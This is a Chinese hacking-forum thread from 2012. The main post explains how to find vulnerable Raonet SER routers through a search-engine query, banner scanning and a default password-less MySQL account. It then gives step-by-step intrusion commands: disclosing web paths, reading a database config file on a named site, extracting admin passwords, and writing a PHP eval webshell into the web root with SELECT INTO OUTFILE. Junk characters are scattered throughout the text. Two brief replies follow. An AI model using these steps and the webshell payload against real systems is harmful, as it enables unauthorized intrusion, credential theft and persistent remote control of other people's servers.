找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 3028|回复: 2
打印 上一主题 下一主题

利用某路由器漏洞入侵国外站点

[复制链接]
跳转到指定楼层
楼主
发表于 2012-12-10 10:30:18 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
  寻找存在漏洞的路由器方法:* d' D/ o: ^: l* E$ g
, d; U+ M! C+ o, B1 w6 g/ M5 G
1:google搜索'Raonet Subscriber Ethernet Router'
9 D9 A8 p3 C& C: O6 Z7 I  Y0 K, T( _& ]0 @
2:使用WebDAVScan扫80端口,http banner为thttpd/2.21b 23apr20018 c% V# {% B& E6 n# [

% [/ Q( I5 }+ R. o8 p6 ~8 n, j. P3:扫mysql版本号判断,SER系列路由器使用的mysql版本4.0.14,默认有一个高权限的帐户mysql,口令为空。
9 K; B; S0 C! A1 ~+ x0 y3 G( A- \
  K7 s' T7 s2 y/ ]" r//还有很多方法可以批量获取,这里不发了,请自食其力 公开了大家都玩不成......& h8 N# w$ q( F; ~& ]# d

: L! L* K. g4 F9 p6 i" {$ H
0 T8 i; i: h3 e1 t& M: `% U* ~5 Y) k4 C: ]1 Z3 n4 l) k
入侵步骤:1 X% b. Y& O/ \6 T6 i* F( n
5 q( R2 a3 U; c( ^, ]7 C4 X* {$ K' m
1.爆web路径,http://www.yu1u.org/src/jpgraph_line.php" T: k; |& u6 Z2 y3 Y
0 }. e( w# {# U( e4 e0 }5 q
2:查看数据库配置文件,http://www.yu1u.org/inc/conn_db.inc7 w: \) p0 b% Q6 Y9 J  `
3:得到密码后连接,查看GUI管理密码:5 X1 o: \. r3 R+ n2 M5 W
use ser_500
8 s4 g8 [3 s, ~! w! S- Gselect id,passwd from user;
6 c. K! r+ I$ i: E7 G! P, D4:通过数据库写入webshell,执行命令:
* Y* ~' @1 c' t; Z4 j2 suse mysql;! k: b- }- Z+ w0 I! E% c! R4 R
create table ok(cmd TEXT);
% D' c% w0 T2 d- Kinsert into ok values("<?php @eval($_POST[cmd])?>");
0 \1 j" D9 j2 T7 yselect * from ok into outfile "\/usr\/local\/www\/data\/src\/shell.php";# x) S* s6 v) q/ C9 M
drop table ok;
; M4 O5 `" b8 u* f' q4 P! D5 J
5 z' I, X" A, ]: Y4 v. p8 E! `5:连接后门shell.php
0 M) N, d3 C1 ^. C
( u) k9 D8 i( b7 _7 y6. 搞定!
# i2 l# l8 V. x! F0 L: |( C% P5 O% ]& y3 S0 F
回复

使用道具 举报

沙发
发表于 2013-7-27 20:06:50 | 只看该作者
这个后果可以很严重的说
回复 支持 反对

使用道具 举报

板凳
发表于 2013-7-29 12:07:54 | 只看该作者
不错哦,黑服务器补洞。。
回复 支持 反对

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表